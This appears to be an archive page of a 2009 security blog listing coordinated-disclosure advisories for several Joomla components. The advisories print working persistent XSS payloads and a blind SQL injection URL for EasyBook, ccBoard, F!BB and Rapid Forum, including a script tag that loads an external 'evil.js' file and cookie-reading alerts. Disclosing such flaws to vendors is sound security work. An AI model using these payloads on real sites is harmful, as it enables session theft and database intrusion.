Joomla Issues with Subdomains
Thursday, 24 September 2009 18:24

While working on a Joomla! site lately, I had an interesting issue arise. None of my scripts or CSS styles would load on a Joomla site installed on a subdomain. Luckily I was able to solve this quickly.

Read more...
EasyBook 2.0.0rc4 Multiple XSS Vulnerabilities
Thursday, 17 September 2009 00:00

The Joomla component EasyBook 2.0.0rc4 suffers from multiple persistent XSS vulnerabilities. One seems fairly critical, while the others would take some incredible creativity to actively exploit.

  1. BBCode XSS

    Settings:

    • Allow BBCode - on (default)
    • Allow Pictures - on (not default)
    [img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]

  2. Website URL XSS

    Settings:

    • Show web site field: Show (default)
    foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;

    Requires minimal user interaction

  3. Skype/Yahoo Username XSS

    Very narrow scope, as entries are truncated. XSS still technically possible. Requires user interaction.

    ' onclick="alert('XSS')"

  4. AIM/MSN Username XSS

    Again, narrow scope. See 3.

    " onclick="alert('xss')"

    ICQ username is similar, but scope seems too narrow to exploit.

Timeline

  • Vulnerabilites Discovered: 10 July 2009
  • Vendor Notified: 10 July 2009
  • Vender Response: 13 July 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 17 September 2009 22:31
ccBoard 1.1-RC XSS Vulnerability
Thursday, 17 September 2009 00:00

The Joomla component ccBoard 1.1-RC suffers from a Cross Site Scripting vulnerability if certain conditions are met. The forum must be set up to use the internal HTML editor and not bbCode. This is the default setting upon install.

To execute, simply post a new message. Either toggle the editor to 'off' or use the HTML Source editing button, insert your JavaScript, and submit!

<script>alert('xss');</script>

The editor was even nice enough to make my XSS injection pretty upon saving:

<script type="text/javascript">// <![CDATA[
alert('xss');
// ]]></script>
Last Updated on Wednesday, 04 November 2009 22:20
F!BB 1.5.96 RC Multiple Vulnerabilities
Thursday, 17 September 2009 00:00

The Joomla component F!BB 1.5.96 RC suffers from multiple persistent XSS vulnerabilities, as well SQL Injection in its user search feature.

  1. ICQ, MSN Profile Fields XSS

    The MSN field will be rendered in the page twice.
    "><script>alert(document.cookie)</script><b f="

  2. AIM Profile Field XSS

    This vulnerability has a limited number of characters, but this will inject script:
    "><script src=//jeffchannell.com/evil.js></script
    NOTE: Skype, Gtalk, website fields are also vulnerable, though the window for injection is even smaller!

  3. Blind SQL Injection

    REQUIRES: magic_quotes_gpc OFF
    index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- '


    If MySQL is version 5, this will return results. Otherwise, no results.

Timeline

  • Vulnerabilites Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vender Response: 31 July 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Friday, 18 September 2009 00:22
Rapid Forum XSS Vulnerability
Thursday, 17 September 2009 00:00

The Joomla component Rapid Forum suffers from a persistent XSS vulnerability.

This vulnerability is pretty easy to exploit, as Rapid Forum does absolutely no validation or encoding whatsoever.
<script>alert(document.cookie)</script>

Timeline

  • Vulnerabilites Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vender Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 17 September 2009 22:30
More Articles...
Page 8 of 13

Featured Extensions

$1.00
FREE
$20.00
$5.00

Latest Articles

Most Popular

Joomla Extensions